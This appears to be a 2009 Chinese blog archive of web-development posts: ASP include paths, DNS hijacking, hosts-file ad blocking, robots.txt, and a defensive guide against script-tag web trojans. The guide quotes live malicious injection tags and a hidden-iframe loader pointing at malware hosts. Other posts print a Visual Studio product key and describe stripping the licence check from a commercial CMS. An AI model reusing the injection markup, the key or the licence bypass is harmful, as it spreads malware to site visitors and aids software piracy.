Daily: File特性不能以斜杠或反斜杠开始的解决方案 以前做项目时都是用的调用代码如下: <!--#include File="Include/md5.Asp" --> 一般而言,网站目录简单的用如此代码不会出现错误!最近做一个项目,因为文件夹很多,所以网站的根目录建了很多文件夹,它们之关的关系要用到调用语句时出现以下错误提示: Active Server Pages 错误 'ASP 0130' 无效的 File 特性 /Admin/Login.Asp,行 12 File 特性 '/Include/md5.Asp' 不能以斜杠或反斜杠开始。 Active Server Pages 错误 'ASP 0131'
不允许的父路径 /wit/chinese/index.asp,行 5 包含文件 '../Inc/eshopcode.asp' 不能用 '..' 表示父目录。 错误的代码为:<!--#include File="/Include/MD5.asp"--> 奇怪,以前没有用过绝对路径,没注意过这方面,赶紧去GOOGLE一下先~~ 答案一:有人说是IIS没有设置父路径,启动父路径选项方法:站点属性--主目录--配置--选项--启动父路径! 不允许的父路径 /Admin/Login.Asp,行 11 包含文件 '../Conn.Asp' 不能用 '..' 表示父目录。 答案二:有人提议说,如果是相对调用可用谐如../的方式,可惜我想相对整站的路径,显然,此方法不适合!最后终于找到解决方法,就是把以下代码 呵呵,群众的力量是无限的,至此,问题解决! 以下为网络相关注释--------------在编写ASP程序的时候,通常都会用到<!--#include virtual/file="path/filename"-->把一段相对独立的文件代码嵌套到当前页面中来。在实际的使用中很多人对 "file"和"virtual"的使用不太理解,导致页面执行的时候会出现错误。现就该问题作一个简述。 使用"file"的时候,等号后面使用的是相对路径。所谓相对路径,是以当前文件所在的文件夹作为始点,通过路径搜索,得到其它文件(或文件夹)与当前文 件的路径关系。使用"virtual"的时候,等号后面使用的是绝对路径。绝对路径,是以网站根目录作为始点,通过路径搜索,得到文件(或文件夹)的完整 路径。 这两个定义不太好理解,举例说明:IIS设置的站点根目录为 "c:\wwwroot\",a.asp文件所在目录是c:\wwwroot\afolder,b.asp文件所在目录是c:\wwwroot\ bfolder,c.asp文件所在目录是c:\wwwroot\afolder\cfolder,则以a.asp作为起点寻找b.asp,所经过的路径 依次为c:\wwwroot\afolder、c:\wwwroot、c:\wwwroot\bfolder;而寻找c.asp,所经过的路径就是c:\ wwwroot\afolder、c:\wwwroot\afolder\cfolder。由此得出,b.asp对于a.asp的相对路径就是.. /bfolder;相同的,a.asp对于b.asp的相对路径就是../afolder。当a.asp文件需要使用"file"调用b.asp文件的时 候,其语句就应该写为<!--#include file="../bfolder/b.asp"-->。调用c.asp,其语句是<!--#include file="cfolder/c.asp"-->。而无论什么时候,a.asp、b.asp、c.asp这三个文件的绝对路径分别是c:\ wwwroot\afolder、c:\wwwroot\bfolder、c:\wwwroot\bfolder\cfolder。因此,在a.asp文 件中使用"virtual"调用另外两个文件,分别为<!--#include virtual="/bfolder/b.asp"-->和<!--#include virutal="/bfolder/cfolder/c.asp"-->。 另外需要提一下的是include与iframe的区别。前者是把一个相对独立的文件代码作为调用文件代码的一部分执行,该语句属于ASP语言,只能用于 asp文件中。而iframe是单纯把一个独立的文件在调用文件中嵌套显示,两者是完全独立的,无任何关系,且iframe属于HTML语言,可在 asp、htm、html等文件中调用。 include file 可以用相对路径或全路径与文件名的组合来描述 如:file= "..\script\my.inc" file="../script/my.inc" 奇怪的是竟然可以 file="../script\my.inc"也通过编译 他的禁止:是不可以用绝对路径来表示 如:file="/script/my.inc" 而对virtual可以使用虚抑的绝对路径来表示 virtual="/yousite/script/my.inc" raintung 2001.5.4 但是对asp3.0的编程中 关于virtual可以使用虚抑的相对路径来表示,我从未验证成功,还望有 人来指点 如 <!-- #include virtual="../script/my.inc" --> 果证明:(1)斜线或反斜线是无关紧要的 (2)file除了全路径不可以表示,而virtual则刚好相反 Active Server Pages 错误 'ASP 0131' 不允许的父路径 /Admin/Login.Asp,行 11 包含文件 '../Conn.Asp' 不能用 '..' 表示父目录。 希望对遇到相同问题的朋友有用.. ^_^ 谢谢访问我的博客空间 http://ytfso 我的QQ空间 Visual Studio 2008 Professional Edition Visual Studio 2008 Professional Edition 到时下载... |
2009年6月28日星期日
Daily: File特性不能以斜杠或反斜杠开始的解决方案
Daily: File特性不能以斜杠或反斜杠开始的解决方案
Daily: File特性不能以斜杠或反斜杠开始的解决方案 以前做项目时都是用的调用代码如下: <!--#include File="Include/md5.Asp" --> 一般而言,网站目录简单的用如此代码不会出现错误!最近做一个项目,因为文件夹很多,所以网站的根目录建了很多文件夹,它们之关的关系要用到调用语句时出现以下错误提示: Active Server Pages 错误 'ASP 0130' 无效的 File 特性 /Admin/Login.Asp,行 12 File 特性 '/Include/md5.Asp' 不能以斜杠或反斜杠开始。 Active Server Pages 错误 'ASP 0131'
不允许的父路径 /wit/chinese/index.asp,行 5 包含文件 '../Inc/eshopcode.asp' 不能用 '..' 表示父目录。 错误的代码为:<!--#include File="/Include/MD5.asp"--> 奇怪,以前没有用过绝对路径,没注意过这方面,赶紧去GOOGLE一下先~~ 答案一:有人说是IIS没有设置父路径,启动父路径选项方法:站点属性--主目录--配置--选项--启动父路径! 不允许的父路径 /Admin/Login.Asp,行 11 包含文件 '../Conn.Asp' 不能用 '..' 表示父目录。 答案二:有人提议说,如果是相对调用可用谐如../的方式,可惜我想相对整站的路径,显然,此方法不适合!最后终于找到解决方法,就是把以下代码 呵呵,群众的力量是无限的,至此,问题解决! 以下为网络相关注释--------------在编写ASP程序的时候,通常都会用到<!--#include virtual/file="path/filename"-->把一段相对独立的文件代码嵌套到当前页面中来。在实际的使用中很多人对 "file"和"virtual"的使用不太理解,导致页面执行的时候会出现错误。现就该问题作一个简述。 使用"file"的时候,等号后面使用的是相对路径。所谓相对路径,是以当前文件所在的文件夹作为始点,通过路径搜索,得到其它文件(或文件夹)与当前文 件的路径关系。使用"virtual"的时候,等号后面使用的是绝对路径。绝对路径,是以网站根目录作为始点,通过路径搜索,得到文件(或文件夹)的完整 路径。 这两个定义不太好理解,举例说明:IIS设置的站点根目录为 "c:\wwwroot\",a.asp文件所在目录是c:\wwwroot\afolder,b.asp文件所在目录是c:\wwwroot\ bfolder,c.asp文件所在目录是c:\wwwroot\afolder\cfolder,则以a.asp作为起点寻找b.asp,所经过的路径 依次为c:\wwwroot\afolder、c:\wwwroot、c:\wwwroot\bfolder;而寻找c.asp,所经过的路径就是c:\ wwwroot\afolder、c:\wwwroot\afolder\cfolder。由此得出,b.asp对于a.asp的相对路径就是.. /bfolder;相同的,a.asp对于b.asp的相对路径就是../afolder。当a.asp文件需要使用"file"调用b.asp文件的时 候,其语句就应该写为<!--#include file="../bfolder/b.asp"-->。调用c.asp,其语句是<!--#include file="cfolder/c.asp"-->。而无论什么时候,a.asp、b.asp、c.asp这三个文件的绝对路径分别是c:\ wwwroot\afolder、c:\wwwroot\bfolder、c:\wwwroot\bfolder\cfolder。因此,在a.asp文 件中使用"virtual"调用另外两个文件,分别为<!--#include virtual="/bfolder/b.asp"-->和<!--#include virutal="/bfolder/cfolder/c.asp"-->。 另外需要提一下的是include与iframe的区别。前者是把一个相对独立的文件代码作为调用文件代码的一部分执行,该语句属于ASP语言,只能用于 asp文件中。而iframe是单纯把一个独立的文件在调用文件中嵌套显示,两者是完全独立的,无任何关系,且iframe属于HTML语言,可在 asp、htm、html等文件中调用。 include file 可以用相对路径或全路径与文件名的组合来描述 如:file= "..\script\my.inc" file="../script/my.inc" 奇怪的是竟然可以 file="../script\my.inc"也通过编译 他的禁止:是不可以用绝对路径来表示 如:file="/script/my.inc" 而对virtual可以使用虚抑的绝对路径来表示 virtual="/yousite/script/my.inc" raintung 2001.5.4 但是对asp3.0的编程中 关于virtual可以使用虚抑的相对路径来表示,我从未验证成功,还望有 人来指点 如 <!-- #include virtual="../script/my.inc" --> 果证明:(1)斜线或反斜线是无关紧要的 (2)file除了全路径不可以表示,而virtual则刚好相反 Active Server Pages 错误 'ASP 0131' 不允许的父路径 /Admin/Login.Asp,行 11 包含文件 '../Conn.Asp' 不能用 '..' 表示父目录。 希望对遇到相同问题的朋友有用.. ^_^ 谢谢访问我的博客空间 http://ytfso.yi.org 我的QQ空间 Visual Studio 2008 Professional Edition Visual Studio 2008 Professional Edition 到时下载... |
2009年6月27日星期六
Visual Studio 2008 Professional Edition
Visual Studio 2008 Professional Edition 到时下载来自己用..这东东不错.
安装完成后是90天试用版 XMQ2Y-4T3V6-XJ48Y-D3K2V-6C4WT 我的QQ空间 Zip Code / City / Area Code 美国邮编号码 Zip Code / City / Area Code96701 Aiea 80896703 Anahola 80896... |
Zip Code / City / Area Code 美国邮编号码
我的QQ空间 2009年高考各地成绩公布时间及查分方式 今天下午,2009年全国普通高校招生全国统一考试工作即将落幕。高... |
2009年6月26日星期五
教你如何 解决使用良精企业建站7.0未注册问题
前些日子改一个后台,是良精的系统,挺好的系统,就是良精太变态了,也难怪人家是要赚钱的,都公开了,那就白白开发了,更何况ASP加密技术又不是很多,除非封装,但封装给自己也带来不便,所以良精使用了很多让人想不到的办法,前面我也写过几篇,大家可以看看有没有需要的。这次用的是 7.0的版本,好像也不是最新的,看到了数据结构,其实良精也是改的是南方的,但南方,人家没有加密,而良精却花了心思去做加密,真想不懂。
遇到的问题就是传到网站上后台部分模块出现未注册,然后是让你联系他们。这次改的时候也主义了那个
sql.asp 文件多次出现引用,开始没有看里面的内容,因为时间比较急。
昨天凌晨上传的,也没看功能,今天朋友说不能用了,才看到,然后开始主义 sql.asp文件,又是老规矩,一大堆
replace. 文件如下:
===================
<%
zj=replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(left(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),6),"0","a"),"1","b"),"2","c"),"3","d"),"4","e"),"5","f"),"6","g"),"7","h"),"8","i"),"9","j"),"a","40"),"b","41"),"c","52"),"d","53"),"e","64"),"f","65"),"g","76"),"h","77"),"i","88"),"j","89"),"k","20"),"l","21"),"m","22"),"n","23"),"o","24"),"p","25"),"q","26"),"r","27"),"s","28"),"t","29"),"u","30") ,"v","31") ,"w","32") ,"x","33") ,"y","34") ,"z","35") ,"-","36") ,".","37")
yzcv=zj*(len(zj)+len(zcn&"liangjingcr"))
Do While yzcv>10000000000
yzcv=yzcv-10000000000
Loop
'Response.Write yzcv&"
"
'Response.Write zcv
if yzcv<>zcv then
response.write chr(60)&chr(98)&chr(62)&chr(60)&chr(102)&chr(111)&chr(110)&chr(116)&chr(32)&chr(99)&chr(111)&chr(108)&chr(111)&chr(114)&chr(61)&chr(35)&chr(70)&chr(70)&chr(48)&chr(48)&chr(48)&chr(48)&chr(62)&chr(-19219)&chr(-12557)&chr(-23622)&chr(-19508)&chr(-12046)&chr(-13872)&chr(-12620)&chr(-10334)&chr(-19743)&chr(44)&chr(-19253)&chr(-18010)&chr(-15140)&chr(-19781)&chr(-15140)&chr(-13639)&chr(-11325)&chr(33)&chr(60)&chr(47)&chr(102)&chr(111)&chr(110)&chr(116)&chr(62)&chr(60)&chr(47)&chr(98)&chr(62)
response.end
end if
%>
============================
还有个zcm.asp文件
<%dim zcn,zcv
zcn="localhost"
zcv=8476869664%>
很明显,问题就在这,然后看不能访问的页面也是 依然 replace 时间紧张,没理会太多,主要是让他能用,所以我删,OK,一切没有问题。别忘了删引用和 各个页面的那段replace
好了,问题解决了,良精注册问题解决了。嘿嘿,笑吧。祝你快乐。
遇到的问题就是传到网站上后台部分模块出现未注册,然后是让你联系他们。这次改的时候也主义了那个
sql.asp 文件多次出现引用,开始没有看里面的内容,因为时间比较急。
昨天凌晨上传的,也没看功能,今天朋友说不能用了,才看到,然后开始主义 sql.asp文件,又是老规矩,一大堆
replace. 文件如下:
===================
<%
zj=replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(left(replace(Request.ServerVariables("SERVER_NAME"),"www.",""),6),"0","a"),"1","b"),"2","c"),"3","d"),"4","e"),"5","f"),"6","g"),"7","h"),"8","i"),"9","j"),"a","40"),"b","41"),"c","52"),"d","53"),"e","64"),"f","65"),"g","76"),"h","77"),"i","88"),"j","89"),"k","20"),"l","21"),"m","22"),"n","23"),"o","24"),"p","25"),"q","26"),"r","27"),"s","28"),"t","29"),"u","30") ,"v","31") ,"w","32") ,"x","33") ,"y","34") ,"z","35") ,"-","36") ,".","37")
yzcv=zj*(len(zj)+len(zcn&"liangjingcr"))
Do While yzcv>10000000000
yzcv=yzcv-10000000000
Loop
'Response.Write yzcv&"
"
'Response.Write zcv
if yzcv<>zcv then
response.write chr(60)&chr(98)&chr(62)&chr(60)&chr(102)&chr(111)&chr(110)&chr(116)&chr(32)&chr(99)&chr(111)&chr(108)&chr(111)&chr(114)&chr(61)&chr(35)&chr(70)&chr(70)&chr(48)&chr(48)&chr(48)&chr(48)&chr(62)&chr(-19219)&chr(-12557)&chr(-23622)&chr(-19508)&chr(-12046)&chr(-13872)&chr(-12620)&chr(-10334)&chr(-19743)&chr(44)&chr(-19253)&chr(-18010)&chr(-15140)&chr(-19781)&chr(-15140)&chr(-13639)&chr(-11325)&chr(33)&chr(60)&chr(47)&chr(102)&chr(111)&chr(110)&chr(116)&chr(62)&chr(60)&chr(47)&chr(98)&chr(62)
response.end
end if
%>
============================
还有个zcm.asp文件
<%dim zcn,zcv
zcn="localhost"
zcv=8476869664%>
很明显,问题就在这,然后看不能访问的页面也是 依然 replace 时间紧张,没理会太多,主要是让他能用,所以我删,OK,一切没有问题。别忘了删引用和 各个页面的那段replace
好了,问题解决了,良精注册问题解决了。嘿嘿,笑吧。祝你快乐。
2009年6月24日星期三
Google国际网站遭到域名劫持 中国国内访问不了
今天晚上,包括Google.com在内的绝大多数Google国际网站,例如Google.com、Gmail、Google Reader、Google Docs等,在中国部分省市均出现无法访问的情况。 根据我的分析,这次封锁Google的方式并不新鲜,是采用域名劫持(DNS劫持)的方法,通过技术手段,将Google的各类境外域名解析到一个错误的地址,使得Google.com无法访问。前段时间,中央电视台曾经在多个栏目中指责Google,并要求其关闭境外网站搜索功能。 经过我的测试,使用中国大陆境内的DNS服务器,例如202.96.134.133是无法正确解析出Google的IP地址,而使用境外的OpenDNS进行域名解析,就可以正确解析出Google的IP地址。如下图所示。
解决的方法是使用境外的域名解析服务器(DNS服务器),例如OpenDNS的 服务,设置方法是,在"设置"-"网络连接"中找到宽带上网的连接,打开网络连接属性,选择Interner协议(TCP/IP)的属性页里,不要选择自 动获取DNS,而要选择"使用下面的DNS服务器地址",首选DNS服务器和备用DNS服务器分别设置为208.67.222.222和 208.67.220.220,如下图所示,完成后重新连接上网,就可以摆脱服务商对我们的DNS劫持。
最后,我强烈谴责这种对于Google网站进行域名劫持的无耻行为。 名词解释(来源于维基百科): DNS是域名系统 (Domain Name Server) 的缩写,该系统用于命名组织到域层次结构中的计算机和网络服务。在Internet上域名与IP地址之间是一对一(或者一对多)的,域名虽然便于人们记 忆,但机器之间只能互相认识IP地址,它们之间的转换工作称为域名解析,域名解析需要由专门的域名解析服务器来完成,DNS就是进行域名解析的服务器。 域名解析的基本原理是把域名翻译成IP地址,以便计算机能够进一步通信,传递网址和内容等。 域名劫持就是在劫持的网络范围内拦截域名解析的请求,分析请求的域名,把审查范围以外的请求放行,否则直接返回假的IP地址或者什么也不做使得请求失去响应,其效果就是对特定的网址不能访问或访问的是假网址。 我的QQ空间 2009年高考各地成绩公布时间及查分方式 今天下午,2009年全国普通高校招生全国统一考试工作即将落幕。高... |
2009年6月23日星期二
2009年高考各地成绩公布时间及查分方式
今天下午,2009年全国普通高校招生全国统一考试工作即将落幕。高考评卷工作开始,18日以后全国各地分数结果陆续推出,考生填报志愿工作也将在 各省的安排下进行。为方便考生及家长查询相关信息,人民网高考频道特别搜集整理了09年高考各地成绩公布时间及查分方式以供参考: 2009年各地高考成绩公布时间及查分方式 省市 查分时间 查分方式 宁夏 6月20日12时 吉林6月21日 甘肃 6月22日18时 贵州 6月22日 内蒙古 6月23日0时 北京 6月23日 浙江 6月23日 江西 6月23日 西藏 6月23日 河北 6月23日 6月23日左右,通知考生成绩及各批录取控制分数线。 福建 6月23日 重庆 6月24日 江苏 6月24日 广西 6月22日 云南 6月25日 天津 6月25日 青海 6月25日 新疆 6月25日 山东 6月25日左右 黑龙江 6月25日左右 湖北 6月25日 河南 6月25日 安徽 6月25日 山西 6月26日 湖南 6月26日 辽宁 6月27日 广东 6月27日 上海 6月27日 四川 6月28日前 海南 6月28日前 我的QQ空间 共享一下:在网页中常用的JavaScript代码 在网页中常用的JavaScript代码! 1>屏蔽功能类1.1 屏蔽键盘所... |
2009年6月21日星期日
教你:两行代码解决网页木马
| 两行代码解决网页木马 前段时间,我渐渐感到压力,头大,通过QQ或MSN加我的人越来越多,我最近自己的工作本来就忙得不亦乐乎。哎,想想,还是要抽空来来帮帮大家。 前不久《一行代码解决iframe挂马(包含服务器端注入、客户端ARP注入等)》得到了很多朋友的认可,这确实是个避避风雨的好办法。可现在挂网马的方式真如我所料地改变了,现在流行挂<script>木马,汗了,看了几个网友的网站都被这样了——页面的顶部或底部加上了: 注意,以下地址含有木马,请不要轻易访问: <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%64%2E%63%6E></script> <script src=http://%76%63%63%64%2E%63%6E></script> 汗死,一连插入了N个一样的<script>标记。偶的电脑什么补丁都打了,直接访问这个http://%76%63%63%64%2E%63%6E(或直接使用迅雷下载),额~ 现形了: document.write("<div style='display:none'>") document.write("<iframe src=http://a.158dm.com/b1.htm?id=017 width=0 height=0></iframe>") document.write("</div>") 又用迅雷下载http://a.158dm.com/b1.htm这个文件,一看,乱七八糟的JS编码,汗,不过找到了一个类似QQ号的数字,直接加加看,汗,然后是专业提供网马的组织,哎,什么世道。还收费蛮高滴呢! ... var Kfqq, Qqs="*********"; qwfgsg="LLLL\\XXXXXLD"; Kfqq = Qqs; (...略)(下面还有N个统计的JS代码)。 针对上面的情况,我也不能白白瞧着不管,想想办法吧,兄弟。喝了碗绿豆粥,糖放得蛮多的,好喝。办法想到了。稍微分析就得出了答案。大家来看看,<script>木马的特点是什么: <script src=http://%76%63%63%64%2E%63%6E></script> 对了,script木马的src一般都是外域的,也就是src是以http打头的,如果是自己网站的script一般都不用加上http;再看看木马的原形,里面还是输出的iframe、JS代码或是其他<object>代码,不管这么多,来多少杀多少。 来跟我写CSS,一一搞定它们,我写了5种不同的方案,大家来测试一下哈: 解决方案1: iframe{n1ifm:expression(this.src='about:blank',this.outerHTML='');} /*这行代码是解决挂IFRAME木马的哦*/ script{nojs1:expression((this.src.toLowerCase().indexOf('http')==0)?document.write('木马被成功隔离!'):'');} 原理:将<script>标记的src拿出来转为小写,再看是不是以"http"开头的外域JS脚本文件,如果是,则页面内容清空并写出"木马被成功隔离!"。反之正常显示。 缺点:访客无法看到被感染了<script>木马的页面。 解决方案2: iframe{nifm2:expression(this.src='about:blank',this.outerHTML='');} script{no2js:expression((this.src.toLowerCase().indexOf('http')==0)?document.close():'');} 原理:将外域的JS文件的document.write()使用document.close()强制关闭。木马内容还没有来得及写完,只有部分被强制缓存输出了,剩下的不会再写了。 解决方案3: iframe{ni3fm:expression(this.src='about:blank',this.outerHTML='');} script{n3ojs:expression((this.src.toLowerCase().indexOf('http')==0)?document.execCommand('stop'):'');} 原理:同到外域的JS文件,立即调用IE私有的execCommand方法来停止页面所有请求,所以接下来的外域JS文件也被强制停止下载了。就像我们点了浏览器的"停止"按钮一样。看来这是JS模拟IE停止按钮的一种方法。 解决方案4: iframe{nif4m:expression(this.src='about:blank',this.outerHTML='');} script{noj4s:expression(if(this.src.indexOf('http')==0)this.src='res://ieframe.dll/dnserror.htm');} 原理:将外域的JS文件的src重写成本地IE404错误页面的地址,这样,外域的JS代码不会下载。 解决方案5: iframe{nifm5:expression(this.src='about:blank',this.outerHTML='');} script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木马被成功隔离!'):''));} 第五种方案的页面HTML源代码<script>中要加入以"lh"为前缀的id,如 lhWeatherJSapi,<script src="***/**.js" id="lhSearchJSapi"></script> 以下页面代码里含有一个木马地址,而且木马在页面里重复了6次,大家分别用我上面的不同方案测试一下,看看我的研究如何!(此测试有一定的危险性,请务必打好所有补丁再测试) <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" c /> <title>让JS木马的进程迅速中止的CSS代码</title> <style type="text/css" id="Lin rStudio"> /*<![CDATA[*/ iframe{nhk1:expression(this.src='about:blank',this.outerHTML='');} script{ngz1:expression((this.src.indexOf('http')==0)?document.close():'');} /* 以后请在此关注最新木马处理方法 */ /*]]>*/ </style> </head> <body> <script type="text/javascript" src="1.js"></script> <script src=http://%76%63%63%64%2E%63%6E></script> <script src="http://%76%63%63%64%2E%63%6E" type="text/javascript"></script> <script src=http://%76%63%63%64%2E%63%6E></script> 我是页面本身的1 <script src=http://%76%63%63%64%2E%63%6E></script> 我是页面本身的2 <script src=http://%76%63%63%64%2E%63%6E></script> 我是页面本身的3 <script src=http://%76%63%63%64%2E%63%6E></script> </body> </html> 其中1.js是自己本站的: document.write("我是本站的JS文件"); document.write("<img src='' />"); 我的测试环境是: Windows XP SP2 和windows Vista SP1 IE6/IE7/IE8 已全部打好补丁。 综上所述,所有目前的挂马方式全都破解了,用CSS就可以解决所有木马问题,访客不会再轻易地中毒了。 大家也要仔细研究一下,看看我的代码有什么BUG,有的话一定要拿出来讨论,好解决问题!或是各位有其他更好的办法可以拿出来讨论一下。 很晚了,我要睡觉了。有空再研究。 更正第五个方案 上面写到的第五个方案代码写错了, <script src="***/**.js" id="lhSearchJSapi"></script> script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==0)?document.write('木马被成功隔离!'):''));} 红色字部分有错误,应该是!=-1,上面的正确写法应该是: script{noj5s:expression((this.id.toLowerCase().indexOf('lh')==-1)?document.write('木马被成功隔离!'):''));} script{noj5s:expression((this.id.toLowerCase().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));} [/code]<script id="tjJSapivok" title="这是你外域的统计流量的JS代码" type="text/javascript" src="http://js.tongji.yahoo.com.cn/1/188/205/ystat.js"></script> <script id="otherJSapivok" title="这是你本站需要的JS文件" type="text/javascript" src="footer.js"></script>[/code]script{noj5s:expression((this.id.toLowerCase ().indexOf('vok')!=-1)?document.write('木马被成功隔离!'):''));} <script id="footerJSapivok" src="这里写你本网站的JS路径" type="text/javascript"></script> <script id="tongjiJSapivok" src="这里外域的JS路径" type="text/javascript"></script> 你网站的所有JS标记(<script>)都得加上id属性,并且有一个共同的前缀、后缀或公共字符串,上面的公共字符串为"vok"。 特此更正,感谢昵称为"网工"的QQ网友提醒。 研究网页挂马破坏用户的斗争还在继续,也不会停止。还望各位将服务器安全性能配置好点,我这也只是临时避避风雨的办法而已 我的QQ空间 共享一下:在网页中常用的JavaScript代码 在网页中常用的JavaScript代码! 1>屏蔽功能类1.1 屏蔽键盘所... |
[转]几种屏蔽广告的方法
今天我的Firefox Adblock不知道怎么的罢工了,可能是我升级火狐版本的原因吧!Firefox Adblock是一个火狐浏览器屏蔽广告的插件,几乎能够屏蔽大部分网页广告,是Firefoxer最喜欢的插件之一。Firefox Adblock罢工引我琢磨出来了几种屏蔽广告的方法,不但适用于屏蔽网页广告 还适用于域名劫持,屏蔽软件广告和百度竞价等。
第一种屏蔽广告的方法
装软件或者浏览器插件更或者修改软件文件,这里有只说一个,屏蔽百度竞价。除了Firefox Adblock外火狐还有很多屏蔽广告的插件,其中就有udiab,udiab 专为百度竞价量身设计开发,具有目标针对性,效果强大,谁用谁知道!自从用了udiab,竞价没了,首页清净了,一口气翻二页,不费劲额。
官方广告词:众里寻他千百度,蓦然回首,那B却在推广处
第二种屏蔽广告的方法
我们就是拿浏览器进行阉割来屏蔽广告,例如禁用js flash,加入ie受阻站点等,这样百分之90的广告都无法显示了。这个方法强大吗?不强大,强大的方法在后面,屏蔽百度竞价太小儿科了,遵循中华民族的传统美德"爱幼",幼稚的小儿科都排前面。
第三种屏蔽广告的方法
换浏览器,主要是针对ie用户来说的,我不强迫你用火狐,你可以用遨游,世界之窗,他们的广告屏蔽效果都不错的,用用就知道。
第四种屏蔽广告的方法
我主要讲这种,这种屏蔽广告的方法几乎是骨灰级的了,第四种屏蔽广告的方法就是用hosts文件来做域名劫持。
hosts是什么,用通俗的语言说:打开浏览器,输入域名回车,浏览器首先会访问本地磁盘hosts文件(winxp路径 C:\WINDOWS\system32\drivers\etc,其它系统自己搜索)查找hosts里面是不是有关于当前域名的ip指定信息,如果你输 入当前域名有指定ip信息,那么就不再进行该域名的dns解析了,浏览器会直接向该ip发送请求。简单来说hosts就是你的本地dns服务器,你可以通 过修改hosts文件将域名"解析"到任何地址。localhost就是这个原理
hosts文件的修改非常简单:ip地址 空格 域名(可以任意空格,域名不要带上/或者http,这样的就url了)换行填下一个。
如何利用hosts屏蔽广告呢?示例:鼠标右键–查看广告窗口(图片或者文字)属性,找到域名,如Google广告的域名 googleads.g.doubleclick.net,然后在hosts文件写入127.0.0.1 googleads.g.doubleclick.net保存退出,刷新浏览器,Google广告还显示吗?不会了吧,其实Google广告不止这个域 名,这个你就慢慢去找了,全告诉你,你就会把雪深的blog广告全部屏蔽了。找阿里妈妈和其它广告商的广告同样道理,逐一找出来,屏蔽了吧。
利用hosts来"劫持域名"解决流氓isp的域名劫持,以劫持攻劫持,我就是这样劫持bjdns2.cncmax.cn:8080到Google的。如 果你发现某个域名不能正常解析访问而被电信或者网通强行跳转到指定的广告页,你就复制这个页面的域名通过修改hosts文件来将这个广告页面(他们说是 "纠错页")劫持到你想去的网站。hosts同样可以解决dns缓存没有更新的域名无法访问,你只要填入ip就可以了。
如果你是家长,你就可以利用hosts来屏蔽你孩子可能浏览的不健康网页。对于讨厌自己身边的人上qq空间,你同样可以屏蔽qq空间,指向脑残教育页面。
利用hosts来解决各种软件的广告,比如腾讯的迷你弹窗,只要找到迷你弹窗的域名,如上方法就可以解决。记住网上所谓去广告绿色版软件慎用,他能去广告就不可插入其它的了吗?这年头胡萝卜都靠不住……..
友情提示:hosts可以为我们解决很多头疼的问题,同时可能会带来很多问题,如果你的hosts文件被人修改了,轻则上不了网,重则被"钓鱼",比如: 你的hosts文件被添加了125.***.**.59 www.alipay.com ,当你打开浏览器登陆支付宝的时候,你的用户名和密码就可能发送到125.***.**.59,这样时候你可能会说 "我打开的网站明明是正确的,为什么密码被盗"。要解决这个就要经常检查hosts文件否安好,最近修改日期是你干的不,360也许能够帮助你修复 hosts,但是你修改过太多就不合适了。
结束语:广告是我们站长的经济来源,是一个网站能够运行的成本,为了给你提供更好的内容和改善站长的生活,请不要随便屏蔽广告,有时候对你也许有用,我"代表"中国几十万站长谢谢你请不屏蔽广告。要屏蔽你就去屏蔽那些门户的广告吧,他们不差钱。
我的QQ空间
共享一下:在网页中常用的JavaScript代码
在网页中常用的JavaScript代码! 1>屏蔽功能类1.1 屏蔽键盘所...
教你robots文件使用方法屏蔽搜索抓取方法
搜索引擎通过一种程序robot(又称spider),自动访问互联网上的网页并获取网页信息。
您可以在您的网站中创建一个纯文本文件robots.txt,在这个文件中声明该网站中不想被robot访问的部分,这样,该网站的部分或全部内容就可以不被搜索引擎收录了,或者指定搜索引擎只收录指定的内容。robots.txt文件应该放在网站根目录下。
当一个搜索机器人(有的叫搜索蜘蛛)访问一个站点时,它会首先检查该站点根目录下是否存在robots.txt,如果存在,搜索机器人就会按照该文件中的内容来确定访问的范围;如果该文件不存在,那么搜索机器人就沿着链接抓取。
robots.txt文件的格式:
"robots.txt"文件包含一条或更多的记录,这些记录通过空行分开(以CR,CR/NL, or NL作为结束符),每一条记录的格式如下所示:
"<field>:<optionalspace><value><optionalspace>"。
在该文件中可以使用#进行注解,具体使用方法和UNIX中的惯例一样。该文件中的记录通常以一行或多行User-agent开始,后面加上若干Disallow行,详细情况如下:
User-agent:
该项的值用于描述搜索引擎robot的名字,在 "robots.txt"文件中,如果有多条User-agent记录说明有多个robot会受到该协议的限制,对该文件来说,至少要有一条User- agent记录。如果该项的值设为*,则该协议对任何机器人均有效,在"robots.txt"文件中,"User-agent:*"这样的记录只能有一 条。
Disallow:
该项的值用于描述不希望被访问到的一个URL,这个URL可以是一条完整的路径,也可以是部分的,任何以Disallow开头的URL均不会被 robot 访问到。例如"Disallow:/help"对/help.html 和/help/index.html都不允许搜索引擎访问,而"Disallow:/help/"则允许robot访问/help.html,而不能访问 /help/index.html。任何一条Disallow记录为空,说明该网站的所有部分都允许被访问,在"/robots.txt"文件中,至少要 有一条Disallow记录。如果"/robots.txt"是一个空文件,则对于所有的搜索引擎robot,该网站都是开放的。
robots.txt文件用法举例:
例1. 禁止所有搜索引擎访问网站的任何部分 下载该robots.txt文件 User-agent: * Disallow: /
例2. 允许所有的robot访问 (或者也可以建一个空文件 "/robots.txt" file) User-agent: *Disallow:
例3. 禁止某个搜索引擎的访问 User-agent: BadBotDisallow: /
例4. 允许某个搜索引擎的访问 User-agent: baiduspiderDisallow: User-agent: *Disallow: /
